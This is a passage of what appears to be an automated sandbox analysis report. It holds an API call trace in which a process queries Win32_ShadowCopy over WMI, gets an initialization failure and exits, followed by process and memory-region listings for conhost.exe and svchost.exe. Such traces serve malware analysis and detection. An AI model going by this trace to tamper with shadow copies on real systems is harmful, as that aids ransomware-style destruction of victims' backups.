returned 0x10 [0109.007] ??0CHString@@QAE@XZ () returned 0x4edf9a8 [0109.007] GetCurrentThreadId () returned 0x538 [0109.007] SysStringLen (param_1="\\\\") returned 0x2 [0109.007] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0109.007] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0109.007] SysStringLen (param_1="\\") returned 0x1 [0109.007] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0109.007] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0109.008] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5105b70, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x9a9564 | out: ppNamespace=0x9a9564*=0x51253a0) returned 0x0 [0109.020] CoSetProxyBlanket (pProxy=0x51253a0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0109.020] ??1CHString@@QAE@XZ () returned 0x740c6430 [0109.020] ??0CHString@@QAE@XZ () returned 0x4edf998 [0109.020] GetCurrentThreadId () returned 0x538 [0109.020] lstrlenA (lpString="") returned 0 [0109.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x962b44, cbMultiByte=-1, lpWideCharStr=0x5323a48, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.021] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0109.021] SysStringLen (param_1="") returned 0x0 [0109.021] IWbemServices:ExecQuery (in: This=0x51253a0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x4edf990 | out: ppEnum=0x4edf990*=0x0) returned 0x80041014 [0109.950] _CxxThrowException () [0109.950] ??1CHString@@QAE@XZ () returned 0x740c6430 [0109.950] GetCurrentThreadId () returned 0x538 [0109.950] ??0CHString@@QAE@PBG@Z () returned 0x4edfa38 [0109.950] ??YCHString@@QAEABV0@PBG@Z () returned 0x4edfa38 [0109.950] ??0CHString@@QAE@XZ () returned 0x4edf904 [0109.951] SysStringLen (param_1="") returned 0x0 [0109.951] CoCreateInstance (in: rclsid=0x9669bc*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x9669cc*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x9a957c | out: ppv=0x9a957c*=0x512ad10) returned 0x0 [0109.954] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x512ad10, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x4edf908 | out: MessageText=0x4edf908*="Initialization failure\r\n") returned 0x0 [0109.965] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x512ad10, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x4edf90c | out: MessageText=0x4edf90c*="WMI") returned 0x0 [0109.965] lstrlenW (lpString="WMI") returned 3 [0109.965] lstrlenW (lpString="Wbem") returned 4 [0109.965] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0109.965] lstrlenW (lpString="WMI") returned 3 [0109.965] lstrlenW (lpString="WMI") returned 3 [0109.965] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0109.965] WbemStatusCodeText:IUnknown:Release (This=0x512ad10) returned 0x0 [0109.965] ??1CHString@@QAE@XZ () returned 0x740c6430 [0109.965] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x4edf164, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0109.966] FormatMessageW (in: dwFlags=0x2500, lpSource=0x4edf164, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x4edf14c, nSize=0x0, Arguments=0x4edf150 | out: lpBuffer="\x9550\x510\x562c\x513") returned 0x2e [0109.966] LocalFree (hMem=0x5109550) returned 0x0 [0109.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0109.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x5329bb0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0109.966] __iob_func () returned 0x76fd1208 [0109.966] fprintf (in: _File=0x76fd1248, _Format="%s" | out: _File=0x76fd1248) returned 46 [0109.967] __iob_func () returned 0x76fd1208 [0109.967] fflush (in: _File=0x76fd1248 | out: _File=0x76fd1248) returned 0 [0109.967] ??1CHString@@QAE@XZ () returned 0x1 [0109.967] ??0CHString@@QAE@PBG@Z () returned 0x4edfa40 [0109.967] ??YCHString@@QAEABV0@PBG@Z () returned 0x4edfa40 [0109.967] GetCurrentThreadId () returned 0x538 [0109.967] ??1CHString@@QAE@XZ () returned 0x1 [0109.967] WbemLocator:IUnknown:Release (This=0x51253a0) returned 0x0 [0109.967] ?Empty@CHString@@QAEXXZ () returned 0x740c6424 [0109.967] _kbhit () returned 0x0 [0109.968] ?Empty@CHString@@QAEXXZ () returned 0x740c6424 [0109.969] WbemLocator:IUnknown:Release (This=0x5105b70) returned 0x2 [0109.969] WbemLocator:IUnknown:Release (This=0x5125170) returned 0x0 [0109.969] WbemLocator:IUnknown:Release (This=0x5125350) returned 0x0 [0109.969] WbemLocator:IUnknown:Release (This=0x5105b70) returned 0x1 [0109.969] ?Empty@CHString@@QAEXXZ () returned 0x740c6424 [0109.969] WbemLocator:IUnknown:Release (This=0x5105b70) returned 0x0 [0109.971] CoUninitialize () [0109.992] exit (_Code=-2147217388) [0109.992] ??1CHString@@QAE@XZ () returned 0x740c6430 [0109.992] ??1CHString@@QAE@XZ () returned 0x740c6430 Thread: id = 16 os_tid = 0x4f0 Thread: id = 17 os_tid = 0x564 Thread: id = 19 os_tid = 0xd6c Thread: id = 20 os_tid = 0xd74 Thread: id = 21 os_tid = 0xa6c Thread: id = 22 os_tid = 0xa44 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4651f000" os_pid = "0x754" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x36c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5620 start_va = 0x7f644000 end_va = 0x7f644fff entry_point = 0x0 region_type = private name = "private_0x000000007f644000" filename = "" Region: id = 5621 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5622 start_va = 0xe415090000 end_va = 0xe4150affff entry_point = 0x0 region_type = private name = "private_0x000000e415090000" filename = "" Region: id = 5623 start_va = 0xe4150b0000 end_va = 0xe4150c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e4150b0000" filename = "" Region: id = 5624 start_va = 0xe4150d0000 end_va = 0xe41510ffff entry_point = 0x0 region_type = private name = "private_0x000000e4150d0000" filename = "" Region: id = 5625 start_va = 0x7df5fff50000 end_va = 0x7ff5fff4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff50000" filename = "" Region: id = 5626 start_va = 0x7ff7d60a0000 end_va = 0x7ff7d60c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7d60a0000" filename = "" Region: id = 5627 start_va = 0x7ff7d60cb000 end_va = 0x7ff7d60cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7d60cb000" filename = "" Region: id = 5628 start_va = 0x7ff7d60ce000 end_va = 0x7ff7d60cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7d60ce000" filename = "" Region: id = 5629 start_va = 0x7ff7d6b10000 end_va = 0x7ff7d6b20fff entry_point = 0x7ff7d6b10000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5630 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5637 start_va = 0xe4152f0000 end_va = 0xe4153effff entry_point = 0x0 region_type = private name = "private_0x000000e4152f0000" filename = "" Region: id = 5638 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5639 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5640 start_va = 0xe415090000 end_va = 0xe41509ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e415090000" filename = "" Region: id = 5641 start_va = 0xe415110000 end_va = 0xe4151cdfff entry_point = 0xe415110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5642 start_va = 0xe4151d0000 end_va = 0xe41520ffff entry_point = 0x0 region_type = private name = "private_0x000000e4151d0000" filename = "" Region: id = 5643 start_va = 0x7ff7d5fa0000 end_va = 0x7ff7d609ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7d5fa0000" filename = "" Region: id = 5644 start_va = 0x7ff7d60cc000 end_va = 0x7ff7d60cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7d60cc000" filename = "" Region: id = 5645 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5646 start_va = 0xe4150a0000 end_va = 0xe4150a6fff entry_point = 0x0 region_type = private name = "private_0x000000e4150a0000" filename = "" Region: id = 5647 start_va = 0xe415210000 end_va = 0xe415210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e415210000" filename = "" Region: id = 5648 start_va = 0xe415220000 end_va = 0xe415226fff entry_point = 0x0 region_type = private name = "private_0x000000e415220000" filename = "" Region: id = 5649 start_va = 0xe4154e0000 end_va = 0xe4154effff entry_point = 0x0 region_type = private name = "private_0x000000e4154e0000" filename = "" Region: id = 5650 start_va = 0x7ffc3e570000 end_va = 0x7ffc3e5c2fff entry_point = 0x7ffc3e570000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5651 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5652 start_va = 0x7ffc55280000 end_va = 0x7ffc552b5fff entry_point = 0x7ffc55280000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5653 start_va = 0x7ffc55380000 end_va = 0x7ffc554dbfff entry_point = 0x7ffc55380000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5654 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5655 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5656 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5657 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5658 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5659 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5660 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5663 start_va = 0xe415230000 end_va = 0xe415230fff entry_point = 0x0 region_type = private name = "private_0x000000e415230000" filename = "" Region: id = 5664 start_va = 0xe415240000 end_va = 0xe415240fff entry_point = 0x0 region_type = private name = "private_0x000000e415240000" filename = "" Region: id = 5665 start_va = 0xe415250000 end_va = 0xe41528ffff entry_point = 0x0 region_type = private name = "private_0x000000e415250000" filename = "" Region: id = 5666 start_va = 0xe4154c0000 end_va = 0xe4154cffff entry_point = 0x0 region_type = private name = "private_0x000000e4154c0000" filename = "" Region: id = 5667 start_va = 0xe4154f0000 end_va = 0xe415677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e4154f0000" filename = "" Region: id = 5668 start_va = 0xe415680000 end_va = 0xe415800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e415680000" filename = "" Region: id = 5669 start_va = 0xe415810000 end_va = 0xe416c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e415810000" filename = "" Region: id = 5670 start_va = 0x7ff7d60c9000 end_va = 0x7ff7d60cafff entry_point = 0x0 region_type = private name = "private_0x00007ff7d60c9000" filename = "" Region: id = 5671 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5672 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5673 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5674 start_va = 0x7ffc54670000 end_va = 0x7ffc54c97fff entry_point = 0x7ffc54670000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5675 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5676 start_va = 0x7ffc559d0000 end_va = 0x7ffc56ef4fff entry_point = 0x7ffc559d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5677 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5678 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5679 start_va = 0x7ffc52d70000 end_va = 0x7ffc52e05fff entry_point = 0x7ffc52d70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5680 start_va = 0xe4150d0000 end_va = 0xe41510ffff entry_point = 0x0 region_type = private name = "private_0x000000e4150d0000" filename = "" Region: id = 5681 start_va = 0xe415290000 end_va = 0xe415293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e415290000" filename = "" Region: id = 5682 start_va = 0xe4153f0000 end_va = 0xe4154a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e4153f0000" filename = "" Region: id = 5683 start_va = 0xe416c10000 end_va = 0xe416d1ffff entry_point = 0x0 region_type = private name = "private_0x000000e416c10000" filename = "" Region: id = 5684 start_va = 0xe416d20000 end_va = 0xe416d2ffff entry_point = 0x0 region_type = private name = "private_0x000000e416d20000" filename = "" Region: id = 5685 start_va = 0xe416d30000 end_va = 0xe417066fff entry_point = 0xe416d30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5686 start_va = 0xe417070000 end_va = 0xe41728efff entry_point = 0x0 region_type = private name = "private_0x000000e417070000" filename = "" Region: id = 5687 start_va = 0xe417290000 end_va = 0xe4174a3fff entry_point = 0x0 region_type = private name = "private_0x000000e417290000" filename = "" Region: id = 5688 start_va = 0xe4174b0000 end_va = 0xe4176ccfff entry_point = 0x0 region_type = private name = "private_0x000000e4174b0000" filename = "" Region: id = 5689 start_va = 0xe4176d0000 end_va = 0xe4177dffff entry_point = 0x0 region_type = private name = "private_0x000000e4176d0000" filename = "" Region: id = 5690 start_va = 0x7ff7d60ce000 end_va = 0x7ff7d60cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7d60ce000" filename = "" Region: id = 5691 start_va = 0x7ffc525f0000 end_va = 0x7ffc52611fff entry_point = 0x7ffc525f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5692 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5693 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5694 start_va = 0xe4152a0000 end_va = 0xe4152a6fff entry_point = 0x0 region_type = private name = "private_0x000000e4152a0000" filename = "" Region: id = 5695 start_va = 0xe4152b0000 end_va = 0xe4152b4fff entry_point = 0xe4152b0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 5696 start_va = 0xe4152c0000 end_va = 0xe4152c0fff entry_point = 0xe4152c0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 5697 start_va = 0xe4152d0000 end_va = 0xe4152d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e4152d0000" filename = "" Region: id = 5698 start_va = 0x7ffc4cbd0000 end_va = 0x7ffc4ce43fff entry_point = 0x7ffc4cbd0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Thread: id = 12 os_tid = 0x41c Thread: id = 13 os_tid = 0x900 Thread: id = 14 os_tid = 0x2ec Thread: id = 15 os_tid = 0xc50 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3daed000" os_pid = "0x324" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b5ca" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5826 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5827 start_va = 0xb42eea0000 end_va = 0xb42eeaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42eea0000" filename = "" Region: id = 5828 start_va = 0xb42eeb0000 end_va = 0xb42eeb0fff entry_point = 0xb42eeb0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 5829 start_va = 0xb42eec0000 end_va = 0xb42eed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42eec0000" filename = "" Region: id = 5830 start_va = 0xb42eee0000 end_va = 0xb42ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000b42eee0000" filename = "" Region: id = 5831 start_va = 0xb42ef60000 end_va = 0xb42ef63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42ef60000" filename = "" Region: id = 5832 start_va = 0xb42ef70000 end_va = 0xb42ef70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42ef70000" filename = "" Region: id = 5833 start_va = 0xb42ef80000 end_va = 0xb42ef81fff entry_point = 0x0 region_type = private name = "private_0x000000b42ef80000" filename = "" Region: id = 5834 start_va = 0xb42ef90000 end_va = 0xb42ef91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42ef90000" filename = "" Region: id = 5835 start_va = 0xb42efa0000 end_va = 0xb42efa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42efa0000" filename = "" Region: id = 5836 start_va = 0xb42efb0000 end_va = 0xb42efb6fff entry_point = 0xb42efb0000 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 5837 start_va = 0xb42efc0000 end_va = 0xb42efc6fff entry_point = 0x0 region_type = private name = "private_0x000000b42efc0000" filename = "" Region: id = 5838 start_va = 0xb42efd0000 end_va = 0xb42efd0fff entry_point = 0x0 region_type = private name = "private_0x000000b42efd0000" filename = "" Region: id = 5839 start_va = 0xb42efe0000 end_va = 0xb42efe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42efe0000" filename = "" Region: id = 5840 start_va = 0xb42eff0000 end_va = 0xb42eff7fff entry_point = 0x0 region_type = private name = "private_0x000000b42eff0000" filename = "" Region: id = 5841 start_va = 0xb42f000000 end_va = 0xb42f00ffff entry_point = 0x0 region_type = private name = "private_0x000000b42f000000" filename = "" Region: id = 5842 start_va = 0xb42f010000 end_va = 0xb42f016fff entry_point = 0x0 region_type = private name = "private_0x000000b42f010000" filename = "" Region: id = 5843 start_va = 0xb42f020000 end_va = 0xb42f0ddfff entry_point = 0xb42f020000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5844 start_va = 0xb42f0e0000 end_va = 0xb42f0e0fff entry_point = 0x0 region_type = private name = "private_0x000000b42f0e0000" filename = "" Region: id = 5845 start_va = 0xb42f0f0000 end_va = 0xb42f0f0fff entry_point = 0x0 region_type = private name = "private_0x000000b42f0f0000" filename = "" Region: id = 5846 start_va = 0xb42f100000 end_va = 0xb42f1fffff entry_point = 0x0 region_type = private name = "private_0x000000b42f100000" filename = "" Region: id = 5847 start_va = 0xb42f200000 end_va = 0xb42f2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f200000" filename = "" Region: id = 5848 start_va = 0xb42f2c0000 end_va = 0xb42f2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f2c0000" filename = "" Region: id = 5849 start_va = 0xb42f2d0000 end_va = 0xb42f2d6fff entry_point = 0x0 region_type = private name = "private_0x000000b42f2d0000" filename = "" Region: id = 5850 start_va = 0xb42f2e0000 end_va = 0xb42f2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f2e0000" filename = "" Region: id = 5851 start_va = 0xb42f2f0000 end_va = 0xb42f2f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f2f0000" filename = "" Region: id = 5852 start_va = 0xb42f300000 end_va = 0xb42f3fffff entry_point = 0x0 region_type = private name = "private_0x000000b42f300000" filename = "" Region: id = 5853 start_va = 0xb42f400000 end_va = 0xb42f587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f400000" filename = "" Region: id = 5854 start_va = 0xb42f590000 end_va = 0xb42f710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f590000" filename = "" Region: id = 5855 start_va = 0xb42f720000 end_va = 0xb42f79ffff entry_point = 0x0 region_type = private name = "private_0x000000b42f720000" filename = "" Region: id = 5856 start_va = 0xb42f7a0000 end_va = 0xb42f81ffff entry_point = 0x0 region_type = private name = "private_0x000000b42f7a0000" filename = "" Region: id = 5857 start_va = 0xb42f820000 end_va = 0xb42f820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b42f820000" filename = "" Region: id = 